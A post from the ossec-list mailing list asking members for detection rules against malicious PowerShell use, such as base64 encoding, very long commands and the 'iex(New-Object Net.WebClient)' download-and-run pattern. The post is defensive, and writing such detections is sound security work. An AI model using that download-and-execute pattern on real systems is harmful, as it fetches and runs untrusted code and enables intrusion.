I was wondering what folks favorite looking for evil rules are? *In particular I was wondering if folks have written any rules along the following lines:*
- Detection of base64 encoding - Powershell command execution - Running of System.Management.Automation.ni.dll (powershell dll I think) - Powershell JEA modifications and process changes - Use of iex(New-Object Net.WebClient) - Execution of downloaded code through PS browser (it's rare to legitimately download code using the Powershell browser?) - Commands with a length greater then 500 Thanks! -- --- You received this message because you are subscribed to the Google Groups "ossec-list" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. For more options, visit https://groups.google.com/d/optout.
